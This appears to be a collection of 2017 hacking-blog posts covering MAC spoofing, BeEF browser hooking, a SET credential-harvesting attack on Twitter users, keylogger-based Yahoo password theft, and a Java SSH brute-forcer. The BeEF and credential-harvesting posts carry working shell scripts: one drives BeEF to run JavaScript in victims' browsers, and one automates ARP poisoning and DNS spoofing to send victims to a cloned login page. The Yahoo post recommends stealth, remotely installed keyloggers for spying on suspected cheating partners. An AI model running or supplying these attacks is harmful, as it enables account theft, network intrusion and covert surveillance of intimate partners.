Friday, July 28, 2017

How to Use Macchanger

Macchanger User Guide

One fundamental skill that any knowledgeable hacker needs to learn is how to spoof various addresses. When most people think about spoofing an address, they think of masking their IP address with NAT or a VPN tunnel. That only covers layer three: users also need to learn how to spoof their MAC address, and in this tutorial we will be talking about macchanger, the Linux tool for doing exactly that.
What is a MAC Address, and What Are They Used for?
Unlike an IP address (a layer three address), a MAC address operates at layer two of the OSI model. As the name implies (Media Access Control), it is used to identify and control the systems that attach to a layer two medium such as a wireless network or a LAN switch. Each network card ships with a MAC address that is meant to be globally unique and is composed of two parts: the OUI (Organizationally Unique Identifier) assigned to the vendor, and a unique ID the vendor assigns to the card.
A MAC address is 48 bits long, written as 12 hexadecimal digits. The first six digits are the OUI and identify the network card manufacturer; the remaining six identify one network card from that manufacturer. If you want to see who made your network card, look up the first six digits of your MAC address in the IEEE OUI registry (a web search for them usually works too). The following are just a few of the uses of MAC addresses:
  • DHCP reservations (static leases) – If a network administrator wants a host to always receive the same IP address without configuring it statically on the host, the DHCP server can be told to hand a fixed address to a specific MAC address. This is most typically done for servers, since it would be a disadvantage if their IP addresses were constantly changing.
  • Address Filtering – some network administrators only allow specific devices to connect to a network, and they make filtering decisions based on MAC addresses since they are globally unique.
  • Authentication Applications – Sometimes ISPs and other network services require a user to sign in or log on with their MAC address.
  • Identification and Temporal Services – Often coffee shops and airports will only permit a short amount of free Internet (30 minutes to an hour). After the time limit has been reached, they will sometimes ban a MAC address, but spoofing your address will allow more free access.
  • Tracking Devices – Because every MAC address is globally unique, it is possible for software to track which locations and networks individual computers connect to.
The following is an example of a valid MAC address:
  • 00:40:96:43:b7:de
In this example, 00:40:96 is the OUI that identifies this MAC address as belonging to a Cisco Aironet product. If you are using a Windows computer and you wish to view your MAC address, the procedure is relatively simple. First, simply open the command prompt by hitting the Windows key and typing “cmd.” This should pull up an application with an icon that looks like a small black window. Once the command prompt has been opened, issue the following command:
  • ipconfig /all
This will display a wealth of information about your computer’s various network interfaces. The field we are interested in is labeled “Physical Address,” which shows each interface’s MAC address. Users on Apple or Linux systems can issue the following variant of the ifconfig command (on Linux distributions that no longer ship ifconfig, ip link show prints the same information, with the MAC address after link/ether):
  • ifconfig -a
Why Spoof Your MAC Address?
The first reason is to cover your tracks and not leave your globally unique MAC address behind in the tables kept by wireless routers and network switches. A switch keeps a table of the MAC addresses it has seen and the port each one was learned on, and a router or access point keeps an ARP table binding MAC addresses to layer three addresses such as IP addresses; a DHCP server logs the MAC address that requested each lease as well. Together these leave an audit trail that leads back to the hacker’s computer. But there are many other reasons.
Believe it or not, some network administrators control access to their network by only permitting known MAC addresses to send data on the local network. If a hacker’s MAC address isn’t on the list, the hacker couldn’t even send a ping to another computer on the local network. However, if they know the address of a device that is permitted to send data, all the hacker needs to do is spoof their MAC address to that known host’s MAC address to gain network access.
Macchanger Tutorial
In this demonstration, we are going to run through the steps necessary to use Macchanger to spoof our MAC address from an Ubuntu command line (BASH shell). We will be performing the commands on an Ethernet interface, but the same concept and procedure applies to other interfaces. Furthermore, there are comparable alternatives to Macchanger for Windows and Apple systems, some of them with GUI front ends that are very simple to use.
Step 1
The very first thing we need to do is verify that our Ethernet interface is up and running. It is also advisable to note the card’s real, permanent address so you can restore it later (macchanger -s eth0 shows the address currently in use). So, to start off, run the ifconfig eth0 command to check the status of your network card.
Step 2
The next thing we need to do is shut down our Ethernet interface to make the change; many drivers refuse to change the address of an interface that is up. To disable the Ethernet interface, issue the ifconfig eth0 down command.
Step 3
Next, simply use Macchanger to spoof the MAC address. By entering the macchanger -r eth0 command, users change their MAC address to a randomly generated address. In current versions the random address has the locally administered bit set, so it does not impersonate any real vendor; if you need an address that looks like it came from the same manufacturer as your card, macchanger -a eth0 picks a random address with a vendor OUI instead.
Step 4
Sometimes users may encounter the following error:
  • ERROR: Can’t change MAC: interface up or not permission: Cannot assign requested address
If this is the case, make sure that two things are true. Firstly, ensure that your Ethernet interface is truly down with the ifconfig eth0 down command. Secondly, make sure that you are running these commands as the root user (or under sudo). The same “Cannot assign requested address” error also appears if you asked for an address the kernel will not accept as a unicast source address, such as all zeros or one whose first octet is odd (the multicast bit set).
Step 5
Verify that the MAC address has truly been changed with the ifconfig eth0 command, then bring the interface back up with ifconfig eth0 up (and renew your DHCP lease if the interface had one). If you wish to set a specific MAC address instead of a randomly generated one, use the macchanger -m [MAC ADDRESS] eth0 command; macchanger -p eth0 restores the permanent hardware address when you are done.
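Putting the MAC address section and the five steps above together, here is an added example (it is not part of the original post): a small shell script that checks the structure of a MAC address the way the first section describes it (OUI, locally administered bit, multicast bit), generates the kind of random address macchanger -r produces, and wraps the down / change / up procedure with the pre-flight checks from Step 4. The interface name and the addresses used for illustration are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: MAC address checks plus a
# wrapper around macchanger that performs the tutorial's steps with the
# pre-flight checks it describes (root, interface down). The interface
# name and the sample addresses are assumptions for illustration.

# Return 0 if $1 is a well-formed colon-separated MAC address.
mac_valid() {
    printf '%s' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# Print the OUI (first three octets) in lower case, e.g. 00:40:96.
mac_oui() {
    printf '%s' "$1" | cut -d: -f1-3 | tr 'A-F' 'a-f'
}

# Decimal value of the first octet, which carries the two flag bits.
mac_first_octet() {
    printf '%d' "0x$(printf '%s' "$1" | cut -d: -f1)"
}

# Return 0 if the locally administered bit (value 2 in the first octet) is
# set. macchanger -r sets it, so a random address never carries a real
# vendor OUI; cloning another card's address with -m leaves it clear.
mac_is_local() {
    [ $(( $(mac_first_octet "$1") & 2 )) -ne 0 ]
}

# Return 0 if the multicast bit (value 1 in the first octet) is set. Such an
# address is never valid as a source address and the kernel rejects it with
# "Cannot assign requested address".
mac_is_multicast() {
    [ $(( $(mac_first_octet "$1") & 1 )) -ne 0 ]
}

# Generate a random unicast, locally administered address (what macchanger -r
# produces): clear bit 0 and set bit 1 of the first octet.
mac_random_local() {
    set -- $(od -An -N6 -tu1 /dev/urandom)
    printf '%02x:%02x:%02x:%02x:%02x:%02x\n' \
        $(( ($1 & 252) | 2 )) "$2" "$3" "$4" "$5" "$6"
}

# Steps 1-5 of the tutorial in one function.
# Usage: spoof_mac IFACE [MAC]   (no MAC: let macchanger pick a random one)
spoof_mac() {
    iface=$1; mac=$2
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    if [ -n "$mac" ]; then
        mac_valid "$mac" || { echo "malformed MAC: $mac" >&2; return 1; }
        mac_is_multicast "$mac" && { echo "multicast bit set: $mac" >&2; return 1; }
    fi
    echo "before:"; macchanger -s "$iface"
    ip link set dev "$iface" down || return 1      # same as: ifconfig IFACE down
    if [ -n "$mac" ]; then
        macchanger -m "$mac" "$iface"
    else
        macchanger -r "$iface"
    fi
    rc=$?
    ip link set dev "$iface" up                    # same as: ifconfig IFACE up
    echo "after:"; macchanger -s "$iface"
    return $rc
}

# Usage: sh macspoof.sh run eth0            (random address)
#        sh macspoof.sh run eth0 00:40:96:43:b7:de   (clone a specific one)
if [ "${1:-}" = "run" ]; then
    spoof_mac "$2" "$3"
fi
```

The checks are worth keeping even if you only ever call macchanger by hand: a malformed or multicast address produces exactly the cryptic error from Step 4, and the locally administered bit is what tells a defender (or you, when auditing a capture) that an address was set in software rather than burned in.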
Final Thoughts
It’s pretty darn easy to configure a new MAC address for a Linux system. In fact, the operation shouldn’t even take novices more than a minute to complete. Remember, spoofing addresses is a pretty basic skill for a hacker to learn. I would also caution you not to use this information to break into a network that you don’t have permission to access. If, for example, your MAC address is blocked, I wouldn’t advise you to employ these methods to gain access, because doing so could be illegal depending on the context and location of the network in question. At any rate, this simple demonstration should show you just how easy it is to spoof a MAC address.

How to Hijack Web Browsers Using BeEF

Welcome back my fellow hackers! Today we’re going to be introducing a new tool for hacking web browsers. Often we need to exploit a variety of vulnerabilities associated with web browsers. For this sort of exploitation, we can use a popular tool named BeEF (the Browser Exploitation Framework).
How BeEF works is fairly easy to understand. BeEF serves a JavaScript file, simply named hook.js. Our job as the attacker is to find a way to run this JavaScript in the victim’s browser. Once it runs, the browser polls the BeEF server for commands, and we have control over it in various aspects for as long as the hooked page stays open. There are multiple ways we can execute this script. For example, we could set up a phishing page with the hook inside of the HTML code, or we could inject it into their traffic using a Man in the Middle attack. But today we’re just going to be using the demo page provided by BeEF. So, let’s get started!

Step 1: Start up and Login to BeEF

If we’re going to use BeEF, we need to start it! If you’re using Kali 2, you can find BeEF on the dock. If you aren’t using Kali 2, you can launch BeEF by entering the following command:
service beef-xss start
Now that we’ve started BeEF, we need to log in. If we point our web browser at localhost on port 3000 with the /ui/authentication URI (http://127.0.0.1:3000/ui/authentication), we will see the BeEF login page. When we see this page, we need to enter the default credentials in order to use BeEF. The default username and password are both “beef,” and they should be changed in BeEF’s config.yaml before port 3000 is reachable from anything but your own machine. Let’s go ahead and log in now:
Alright, now that we’ve entered our credentials and logged in, we can see the first page. Let’s take a look at this page and then we’ll break it down:
Now, to our immediate left we can see a section named “hooked browsers.” This is where BeEF will list all the browsers we currently have under our control. There is only one victim here at the moment, which is ourselves. Now that we’ve logged in and seen the start page, let’s move on to hooking our victim.

Step 2: Hook the Victim

Now that we have BeEF up and running, we need to hook the victim so that we can control their browser. We will be using the BeEF demo page to run the hook. Now we switch to the victim and navigate to the demo page. The demo page can be accessed in a browser by entering the address of the attacking system on port 3000 under /demos/basic.html, so we need to enter that address in our victim’s browser. Let’s do that now:
Now that we’ve navigated our victim to the demo page containing the BeEF hook, we should see them appear under the “hooked browsers” section we saw earlier:
There we go! We’ve successfully hooked our victim’s browser. Now that we have some basic control over it, we can do many things that will aid us in compromising this victim.

Step 3: Wreak Havoc

Now that we can control our victim’s browser, we’re going to demonstrate the kind of things we can do. We’re simply going to use some JavaScript to find out what plugins are installed in the browser. First, we need to select our victim and navigate to the “commands” tab of BeEF’s GUI. Let’s see what this looks like now:
Now that we’ve navigated to our commands tab, we can look through all of the possible commands we can execute on the victim’s browser. Please note that not all of these will work, as some of them are circumstance specific (BeEF colour-codes each module by how reliably it is expected to work against the hooked browser). The one we’re after in this instance is the Raw JavaScript module. We can find this module under the “Misc” folder in the commands tab. Let’s select this module now:
We can see that in this module we have a box to enter some JavaScript. In order to see the plugins that the victim has, we’re going to return some information out of the “navigator” object using our code (navigator.plugins is an array-like list of the installed plugins, each with a name and a description). We’re also going to make an alert box appear in the victim’s browser, just for fun. Let’s take a look at this code now:
Now that we have entered our code to execute, we simply need to press the “execute” button on the bottom right of the BeEF page. Once we do this, we should see the JavaScript return an array containing the currently installed plugins. Let’s execute our code and see the results now:
Here we can see a list of all the plugins that the victim has installed in their browser! We could look deeper and see if there are any exploitable vulnerabilities in these plugins, but that’s best discussed later. (Note that current versions of Chrome and Firefox no longer expose the real plugin list through navigator.plugins; they return a fixed set of PDF-viewer entries, so this particular module tells you far less than it did when this was written.) Now that we have our results, let’s move back to the victim and take a look at our alert box!
There we have it! We were not only able to successfully hijack our victim’s browser, but we were able to extract information from it that could open a future avenue for attack! As we’ve demonstrated here today, browser hijacking can be extremely useful to any hacker looking for a way into a system. Not only is it good for finding the vulnerabilities, but in some cases we can use it to exploit them as well. That’s all for the introduction to hijacking with BeEF. In the next article, we’ll be taking a closer look at social engineering with BeEF, and how we can use it to steal credentials from the user! I’ll see you there!
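Everything done through the web UI in Steps 1 to 3 can also be scripted, which is how you would drive BeEF from a larger toolchain. The following is an added example and is not code from the original post or from the BeEF project: it logs in, lists the hooked browsers, and fires the Raw JavaScript module with the same navigator.plugins payload against a hooked session, all through BeEF’s REST API with curl. The server address, the default beef/beef credentials, the API routes (/api/admin/login, /api/hooks, /api/modules/SESSION/MODULE_ID) and the parameter name "cmd" for the Raw JavaScript module are assumptions taken from the BeEF wiki; check them against your version.

```shell
#!/bin/sh
# Added example, not from the original post or the BeEF project: steps 1-3
# driven from the command line through BeEF's REST API rather than the web
# UI. Assumptions: BeEF on 127.0.0.1:3000 with the default beef/beef
# credentials, the API routes as documented on the BeEF wiki, and "cmd" as
# the parameter name of the Misc / Raw JavaScript module.
BEEF_URL=${BEEF_URL:-http://127.0.0.1:3000}
BEEF_USER=${BEEF_USER:-beef}
BEEF_PASS=${BEEF_PASS:-beef}

# The JavaScript the post types into the Raw JavaScript module: pop an alert
# in the hooked browser and hand the plugin names back to BeEF as the result.
PAYLOAD_JS='alert("Hooked by BeEF"); var p = []; for (var i = 0; i < navigator.plugins.length; i++) { p.push(navigator.plugins[i].name); } p.join(", ");'

# The hook tag an attacker plants in a phishing page or injects via MitM;
# BeEF's /demos/basic.html page contains the same tag.
hook_tag() {
    printf '<script src="%s/hook.js"></script>' "$1"
}

# Pull one string field out of a flat JSON object without jq:
#   json_field token '{"success":true,"token":"abc"}'  ->  abc
json_field() {
    printf '%s' "$2" | sed -n "s/.*\"$1\":\"\([^\"]*\)\".*/\1/p"
}

# Escape backslashes and double quotes so a JS payload survives inside a
# JSON string literal (the usual way a module submission gets mangled).
json_escape() {
    printf '%s' "$1" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g'
}

# JSON body for the Raw JavaScript module.
raw_js_body() {
    printf '{"cmd":"%s"}' "$(json_escape "$1")"
}

# Step 1: log in and print the API token.
beef_login() {
    resp=$(curl -s -H 'Content-Type: application/json' \
        -d "{\"username\":\"$BEEF_USER\",\"password\":\"$BEEF_PASS\"}" \
        "$BEEF_URL/api/admin/login")
    json_field token "$resp"
}

# Step 2: list hooked browsers (online and offline) as JSON; the "session"
# value of each entry is what the module routes need.
beef_hooks() {
    curl -s "$BEEF_URL/api/hooks?token=$1"
}

# Step 3: run a module against a hooked session and print the response,
# which carries the command_id to poll for the result.
# Usage: beef_run_module TOKEN SESSION MODULE_ID JSON_BODY
beef_run_module() {
    curl -s -H 'Content-Type: application/json' -d "$4" \
        "$BEEF_URL/api/modules/$2/$3?token=$1"
}

# Usage: sh beef_api.sh run SESSION RAW_JS_MODULE_ID
# (find the module id with: curl -s "$BEEF_URL/api/modules?token=$TOKEN")
if [ "${1:-}" = "run" ]; then
    tok=$(beef_login)
    [ -n "$tok" ] || { echo "login failed" >&2; exit 1; }
    echo "hooked browsers:"; beef_hooks "$tok"; echo
    beef_run_module "$tok" "$2" "$3" "$(raw_js_body "$PAYLOAD_JS")"
fi
```

The payload is the part worth getting right: a double quote inside the JavaScript that is not escaped breaks the JSON body, and the module silently does nothing, which is why the escaping lives in its own function instead of being inlined into the curl call.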

Thursday, July 27, 2017

How Hackers Steal Passwords using the SEToolkit

Welcome back my fellow hackers! In the past few articles we’ve been preparing to steal credentials from users on our local network, and today we’re going to be performing this attack. We’ll start by explaining the anatomy of the attack, and then we’ll perform the attack for ourselves. We’re going to be combining the techniques from those earlier articles (for a refresher on the first of them, see How Hackers Spy on People with a Man in the Middle Attack).

The Anatomy of Credential Capturing

First, we’ll be discussing the basic anatomy of credential capturing, starting with a quick look at Man in the Middle attacks and DNS spoofing. Since we’ve already covered these we won’t be going too far into detail. If you need a refresher on these attacks, see the links above.
Man in the Middle attacks are very simple. An attacker simply places themselves between two parties so that all traffic flows through them. This way, the attacker can read all unencrypted traffic. The Man in the Middle in and of itself isn’t very powerful. But it opens the gateway to many other kinds of attacks. A MitM attack can be seen in the diagram below.
Next up, we have DNS spoofing, which we’ve also covered before. These attacks are also rather simple. The attacker (us), listens for DNS queries for a certain host, and spoofs the response to that request with whatever address they want. This way they can redirect the victim to whatever address they wish. DNS spoofing can be seen in the following diagram.
Alright, now that we’ve reiterated all of the attacks we’ve already done, it’s time to move on to the interesting stuff: stealing passwords! We’re going to be using something called the Social Engineering Toolkit, or SEToolkit (SET) for short. This toolkit is something that any hacker should be at least a little familiar with. It allows us to perform many different social engineering attacks. One of these is the credential harvester, which clones whatever website we give it, saves a copy to our local machine, and rewires the login form so that submitted fields are written to a file before the victim is forwarded on to the real site. This lets us set up a server on our attacking machine and serve the page just as the legitimate web server would. That’s about it for the anatomy of this attack, so let’s move on!

Performing the Attack

Step 1: Use the SEToolkit Credential Harvester Module

First, we’re going to clone the site with SEToolkit to get that out of the way. To start SET we just use the setoolkit command.
After a little while, and maybe a prompt or two, the SET should be ready to go. Once it boots up, we should see a menu that looks something like the screenshot below. We’re going to be choosing the first option, social engineering attacks.
Now we should be presented with another set of numbered options, we’re going to be selecting the second option, website attack vectors.
Guess what we have next! That’s right, more numbered menus! In this next menu we’ll be selecting the third option, the credential harvester attack method. Don’t worry about all these other options, we’ll get to them in due time.
Now all we have to do before putting in our attack details is select the site cloner, which is the second option.
Alright, now that we’re in the correct area of SET to enter our attack information, we need to get some information to enter! To start, we’re going to get our local IP address, which we’ll need to give to SET. We can get this by using the ifconfig command.
Now that we have our local IP address, we can hand it to SET in the first site cloner prompt (this is the address the cloned form will post back to, so it must be the one the victim can reach).
Next, it will ask for the URL of the site we want to clone. This will clone the website and save it to our machine. We’ll be stealing an unsuspecting Twitter user’s password, so we’ll be cloning the Twitter website.
It should go on to clone the Twitter login page. Once it’s done cloning, it should ask us if we want to start the Apache web server process; go ahead and say yes to this prompt in order to avoid having an extra step.
You may need a little patience as this can take some time depending on your connection speed, but after a while we should get confirmation that the site has been cloned into the Apache directory and that the Apache service has been started.

Step 2: Start the Man in the Middle Attack

In order to perform DNS spoofing, we need to be able to see the victim’s traffic, so we’re going to use a man in the middle attack to place ourselves between the victim and the default gateway. First, we need to find the address of the default gateway, which we can get using the route command (route -n, or ip route on newer systems).
We can see the address of our gateway in that output. Remember to enable IP forwarding before continuing, otherwise the victim loses connectivity the moment we poison its ARP cache and the attack becomes obvious; enable it with this command: echo 1 > /proc/sys/net/ipv4/ip_forward (the value must be 1, writing 0 turns forwarding off). In order to make our job easier, we already have the address of our victim. Now that we have this information, we can start the MitM with the arpspoof tool, running it once in each direction (telling the victim we are the gateway, and telling the gateway we are the victim) so that replies flow through us as well.
Now that the MitM is started, we can move on!

Step 3: Start the DNS Spoofing Attack

In order to perform our DNS spoofing attack we need a hosts-format file that tells the DNS spoofing tool which names we want to spoof replies for. The original walkthrough edits /etc/hosts for this; dnsspoof takes the file with its -f option, so a separate file is cleaner than editing the system one. Since we’re pretending to be Twitter, we’re going to add a line mapping twitter.com (and, with a second wildcard entry, *.twitter.com, so the www and mobile hosts are covered too) to our attacking machine’s IP address.
Now that we’ve added this line, the DNS spoofing tool will know that we want to spoof replies to queries for Twitter. Now we just have to start the dnsspoof tool, pointing it at our hosts file with -f, and we’re good to go!

Step 4: Capture the Credentials

Now that we have all our attacks running, we can capture the credentials of our victim! From our victim PC, let’s point the browser at Twitter and try to log in.
Seems legit, huh? The biggest give-away for this attack is the message about using the mobile version of Twitter. Another is the missing HTTPS: the clone is served over plain HTTP, and a browser that enforces HSTS for twitter.com (every current browser does, through the preload list) refuses to load the site over HTTP at all, so this step only works against a browser that is not enforcing HSTS for the domain.
I’ve entered fake credentials for a fake user named victim_user and I’ve also entered a fake password. When we try to log in it will fail and we’ll be redirected to the real Twitter. It is at this point that we should stop all the attacks, so that we don’t raise any suspicion by playing with the victim’s traffic when we don’t need to.
Now that we’ve tricked our victim into logging in, let’s go to the Apache web root (/var/www/html on Kali, the directory SET cloned the site into) and see if anything new has shown up.
We can see that a new text file has appeared with the harvester name. This file should contain the captured credentials of the user, so let’s crack it open and find out!
There we have it! We were able to use MitM and DNS spoofing attacks in order to perform a credential harvesting attack! This is more than just a step-by-step on stealing passwords, it’s a proof of concept. By learning the in’s and out’s of these smaller attacks such as Man in the Middle and DNS spoofing, we can combine them together to make for a much more powerful attack. There’s a deeper message here, and that message is this: hacking is more than just technical skills. Hacking is just as much about creativity as it is about knowing your way around a computer, and today we’ve proven that.
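Steps 2 and 3 above are three separate commands that have to be started together and stopped together, and the order matters (forwarding before poisoning, restore before stopping). The following is an added example, not part of the original post, that wraps them in one script: it validates the addresses, writes a dedicated hosts file for dnsspoof, poisons both ends of the victim/gateway conversation, and tears everything down on Ctrl-C. The interface name, the victim, gateway and attacker addresses are placeholders passed on the command line; it needs root and the dsniff tools (arpspoof, dnsspoof).

```shell
#!/bin/sh
# Added example, not from the original post: steps 2 and 3 of the attack run
# from one script, with the three moving parts (IP forwarding, ARP spoofing
# in both directions, dnsspoof with its own hosts file) started together and
# undone on exit. Interface, victim, gateway and attacker addresses are
# placeholders passed on the command line; twitter.com is the site the post
# clones. Requires root and the dsniff tools (arpspoof, dnsspoof).

# Return 0 if $1 is a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for o in $(printf '%s' "$1" | tr . ' '); do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# Write the hosts-format file dnsspoof -f reads: the bare domain plus a
# wildcard entry, because dnsspoof matches names literally and the login
# flow also touches www.twitter.com and mobile.twitter.com.
# Usage: write_spoof_hosts FILE ATTACKER_IP DOMAIN...
write_spoof_hosts() {
    f=$1; ip=$2; shift 2
    : > "$f"
    for d in "$@"; do
        printf '%s\t%s\n%s\t*.%s\n' "$ip" "$d" "$ip" "$d" >> "$f"
    done
}

# The victim must keep reaching the Internet through us or the attack is
# obvious. The value written must be 1; 0 turns forwarding off.
enable_forwarding() {
    echo 1 > /proc/sys/net/ipv4/ip_forward
}

# Usage: start_attack IFACE VICTIM GATEWAY HOSTSFILE
start_attack() {
    iface=$1; victim=$2; gateway=$3; hosts=$4
    valid_ipv4 "$victim" && valid_ipv4 "$gateway" || { echo "bad address" >&2; return 1; }
    enable_forwarding
    # Poison both ends: the victim learns our MAC for the gateway and the
    # gateway learns our MAC for the victim, so replies transit us as well.
    arpspoof -i "$iface" -t "$victim" "$gateway" >/dev/null 2>&1 &
    PIDS=$!
    arpspoof -i "$iface" -t "$gateway" "$victim" >/dev/null 2>&1 &
    PIDS="$PIDS $!"
    dnsspoof -i "$iface" -f "$hosts" &
    PIDS="$PIDS $!"
}

# Stop everything. arpspoof re-announces the real MAC addresses when it is
# terminated, so it gets a plain SIGTERM and a moment to do that before
# forwarding is switched off again.
stop_attack() {
    kill $PIDS 2>/dev/null
    sleep 2
    echo 0 > /proc/sys/net/ipv4/ip_forward
}

# Usage: sh mitm_dns.sh run IFACE VICTIM_IP GATEWAY_IP ATTACKER_IP
if [ "${1:-}" = "run" ]; then
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; exit 1; }
    valid_ipv4 "$5" || { echo "bad attacker address" >&2; exit 1; }
    hostsfile=$(mktemp)
    write_spoof_hosts "$hostsfile" "$5" twitter.com
    trap 'exit 130' INT TERM
    trap stop_attack EXIT
    start_attack "$2" "$3" "$4" "$hostsfile"
    echo "MitM and DNS spoofing running; harvested logins land in SET's harvester file. Ctrl-C to stop."
    wait
fi
```

Keeping the spoof entries in their own file rather than /etc/hosts also means your own machine never resolves twitter.com to itself, which would otherwise break SET’s redirect to the real site after the victim submits the form.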

Tuesday, July 25, 2017

How to Hack Yahoo Password

Every day, a lot of people contact me about suspecting their boyfriend or girlfriend of cheating and ask me about ways to hack Yahoo password of their account. By doing so they hope to investigate the truth about their partners.
If you are in a similar situation or just wondering to know how to hack a Yahoo password, this post can surely help you out.

1. Keylogging: Easiest Way to Hack Yahoo Password

Using a keylogger is the easiest way to gain access to Yahoo and other online account passwords. A keylogger is a small program that runs in a hidden mode and captures each and every keystroke (including passwords) that a user types on the computer’s keyboard. This makes it possible for one to easily obtain the password of any Yahoo account.
The special thing about keylogger is that anyone with a basic knowledge of computer should be able to install and use it. With my experience, I recommend the following keylogger as the best for your password hacking needs:

Key Features of Realtime-Spy:
    After installation, Realtime-Spy operates in total stealth mode to capture the password of the target Yahoo user. This makes it impossible to detect its presence. Hence, you can relax and stop worrying about being traced back.
    In addition to installation on a local computer, this program also supports remote installation. That means you can install it even on computers to which you do not have physical access and record Yahoo activity on them.
    Once installed on the target computer, Realtime-Spy captures all the keystrokes (including passwords of Yahoo and other online accounts). The logs are then continuously uploaded to the Realtime-Spy servers. You can access the logs on your web browser from any place at any time to obtain the password of target Yahoo user.
    Realtime-Spy is fully compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.
FAQs About Realtime-Spy:
I don’t have physical access to the target computer, what can I do?
You need not worry! As Realtime-Spy offers Remote Installation Feature, it is possible to install it on the computer (on which the target Yahoo user is likely to access his/her Yahoo account). However, local installation is also supported.
Does Realtime-Spy collect any personal information from me?
Realtime-Spy does not collect any personal information from its users. Your privacy is totally guaranteed!
Is Realtime-Spy trustworthy?
Realtime-Spy is backed by thousands of trusted users across the world over the last ten years. It is a software program developed by Spytech Software and Design, Inc., a reputable company in the United States.
What are the other features of Realtime-Spy software?
  • With Realtime-Spy, you can gain access to any password protected account including Yahoo, Gmail, Hotmail, Facebook etc.
  • This software will not only capture passwords (Yahoo, Gmail etc.), but will also take screenshots and record chat conversations.
You can grab Realtime-Spy from the link below:

Download Realtime-Spy – for Windows
Download Realtime-Spy – for Mac

If the target user is likely to access his/her Yahoo account from a mobile device, you will have to go for the mobile version of the above program called mSpy:
Download mSpy – for Mobile Devices
Supported Phones: Android Phones, iPhones, Apple iPads and Android Tablets.

2. Other Ways To Hack Yahoo Password

The other most commonly used trick to hack a Yahoo password is a fake login page (also called phishing). Today, phishing is the most widely used technique to hack Yahoo passwords. A fake login page is a page that resembles the login pages of sites like Yahoo, Gmail, Facebook etc. The victim is tricked into believing this fake Yahoo login page to be the real one, but once the user enters the password there, the login details of his/her Yahoo account end up in the hands of the hacker.
Phishing can be very effective when implemented successfully. But creating a fake login page for websites like Yahoo and taking it online to make the hack attempt successful is not an easy job. It demands in-depth technical knowledge of HTML and scripting languages like PHP and Perl.
Phishing is a Cyber Crime
Carrying out a phishing attack is a criminal offense and if caught one can end up behind bars! So, if you are a novice computer user with very basic knowledge, I recommend the use of keyloggers as the best way to hack a Yahoo password.
None of the Yahoo hacking methods other than those mentioned above are known to work successfully. So, if you come across any other method it should either be an obsolete one or just a scam.
Some sites are also found to be making false promises that they can give access to any Yahoo account for which the users will have to take up a few surveys. In a hope of getting the Yahoo password users complete the surveys but no password is offered to them upon completion. So, beware of those fake Yahoo hacking sites and do not waste your time on them.

How to Build an SSH Password Cracker in Java

Welcome back everybody! I’m back and better than ever with a new round of fresh hacks to share with you! So, with that out of the way, let’s talk about what we’ll be doing today.
There are many services that require passwords in order to access their goodies. Often we, the attackers, need to steal these passwords in order to take said goodies. One of these services is SSH (Secure SHell). SSH allows for the remote management and use of things like network devices and servers. If we could find the SSH password, we could have control over the target system!
Normally, we could look for some password disclosure vulnerability or do some social engineering. But, when all else fails, we can use brute force to try and crack the password the hard way. Today we’ll be building a tool that will go through a list of possible passwords to see if they’re correct. We’ll be building our password cracker in Java, so let’s get started!

Step 1: Downloading JSch

To make a long story short, Java does not natively support the SSH protocol. This means that we’ll have to use a third-party package in order to build our password cracker.
The package we’ll be using is JSch. This will allow us to perform the SSH logins, so we need to download it and import it in our Java code. You can download it by running the following command:
wget -q --show-progress -O jsch.jar
We should get output that looks like this:
Now that we’ve downloaded the package we need, we can get to actually coding our password cracker!

Step 2: Importing Packages

In Java, we need to import quite a number of packages before we can get started building. This step is rather simple to explain, we’re just going to import a bunch of packages. So, let’s do that now:
We can see here that we import a small number of packages, ending with our newly downloaded JSch package. Now that we have our packages, we can get started on the exciting stuff!

Step 3: Declaring Class and Checking Host

In Java, all functions for a certain program must be stored under the class for that program. So, since our program name is sshbrute then our class name will also be sshbrute. Pretty simple, right? After we declare our class, we’re going to make our first function. This function will attempt to connect to a given port on the target system. This is to ensure that the port specified by the attacker is, in fact, open. So, let’s take a look at this code:
Let’s break this down really quick. First, we declare our sshbrute class, nothing special there. Next, we make a function named checkHost. This function opens a socket and attempts to connect to a port given as an argument (this connection attempt does have a timeout set). Let’s move on to the next section!

Step 4: Reading a Wordlist

The way this password cracker will work is that it will attempt to log in to an SSH service with a set of passwords. This set of passwords is called a wordlist. These are normally stored in normal text files, so we need to have a function to read a text file and extract all the passwords we need to try. Let’s take a look at it:
First of all, our function takes a single argument, a file path. This will be the path to the wordlist file we need to read. Next, it declares an array list to store the passwords in. An array list is like a dynamic array, so we don’t have to give it a buffer, we can just add things to it (that makes our job much easier).
After declaring our array list, we open up the wordlist file with a buffered reader. We then read the file line-by-line and add each line to the array list until there are no more lines left in the file. Once this is complete, we return our completed array list. Now that we can read and store a wordlist, we can build the function to try them.

Step 5: Attempting Logins

Before we try all of these passwords, we need a function that will accept one password and try it out. This will keep everything organized in our final function. We’ll take a look at the code, then break it down:
This function is rather simple. We simply dissected the example code given by the JSch developer website and ripped out the code that is used to log in to SSH. This function will make a new session, configure the password and key checking, and attempt to log in to the service. It will then disconnect from the service and return true or false.
Now that we have all our base functions, we can finally make our main function.

Step 6: Build the Main Function

Every Java program must have a main function. This is the function that will executed when we run our program. We’ll start the main function by taking some command line arguments and assigning some variables. Let’s take a look at the first half of our main function:
We start by checking for the correct number of arguments; if it is wrong, we provide a very basic usage message to the user. If the correct number of arguments is supplied, we declare two variables: one being the host address, the other being the port running the SSH service (normally this port is 22, but an admin may move it to a different port to cut down on automated scanning; that is obscurity rather than security, and it is why our tool takes the port as an argument).
We then do some checking on the first argument and fill out our variables accordingly. Now that we’ve got this out of the way, we can see the second half of our main function:
In the second half of our main function, we use all the functions we made earlier. First, we call the checkHost function to make sure the target is up and running. We’ve also assigned the target username to its own variable. We then make a new array list and store the result of our wordlist-reading function in it.
Next, we print that the cracking has started, along with some information about the attack. Once this print happens, the cracking begins! We start by making a for loop that will iterate through the length of our wordlist. For each iteration, it will call that password out of the wordlist and pass it to the crackPass function. If the login is successful, we inform the user and shutdown the program. Otherwise, we keep going until we run out of passwords.
